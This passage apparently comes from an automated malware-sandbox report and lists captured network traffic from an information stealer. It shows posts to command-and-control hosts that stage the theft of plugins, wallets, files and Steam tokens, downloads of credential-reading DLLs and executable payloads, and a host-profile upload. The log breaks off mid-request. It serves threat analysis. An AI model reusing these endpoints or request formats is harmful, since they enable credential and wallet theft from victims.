                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFCHost: 135.181.65.216Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 2d 2d 0d 0a Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="message"plugins------BAKEBAFIIECBGCAAAAFC--
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAHost: 135.181.65.216Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="message"fplugins------DHIDHIEGIIIECAKEBFBA--
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFCHost: 135.181.65.216Content-Length: 5255Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/sqlite3.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 39 35 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1009574001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010456001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDHHost: 135.181.65.216Content-Length: 991Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBKHost: 135.181.65.216Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 135.181.65.216Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file"------DGHJEHJJDAAAKEBGCFCA--
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKHost: 135.181.65.216Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 2d 2d 0d 0a Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="file"------EHIDAKECFIEBGDHJEBKK--
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/freebl3.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/mozglue.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/msvcp140.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/nss3.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010458001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/softokn3.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /4a21a126be249f0d/vcruntime140.dll HTTP/1.1Host: 135.181.65.216Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDHHost: 135.181.65.216Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKFHost: 135.181.65.216Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 2d 2d 0d 0a Data Ascii: ------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="message"wallets------EBGDAAKJJDAAKFHJKJKF--
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIEHost: 135.181.65.216Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 2d 2d 0d 0a Data Ascii: ------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="message"files------FBAAAKFCAFIIDHIDGHIE--
                                  Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 496132Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 37 32 32 38 33 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFHHost: 135.181.65.216Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 2d 2d 0d 0a Data Ascii: ------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="file"------DAFCAAEGDBKJJKECBKFH--
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFCHost: 135.181.65.216Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 2d 2d 0d 0a Data Ascii: ------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="message"ybncbhylepme------FCFBFBFBKFIDHJKFCAFC--
                                  Source: global trafficHTTP traffic detected: POST /ee45b7c5e4cb75cb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGHHost: 135.181.65.216Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 2d 2d 0d 0a Data Ascii: ------CBAKJEHDBGHIEBGCGDGHContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------CBAKJEHDBGHIEBGCGDGHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CBAKJEHDBGHIEBGCGDGH--
                                  Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
                                  Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010681001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 37 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010747001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 35 35 37 36 44 46 41 33 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 2d 2d 0d 0a Data Ascii: ------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="hwid"8E5576DFA3442409657292------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="build"stok------FBFHJJJDAFBKEBGDGHCG--
                                  Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 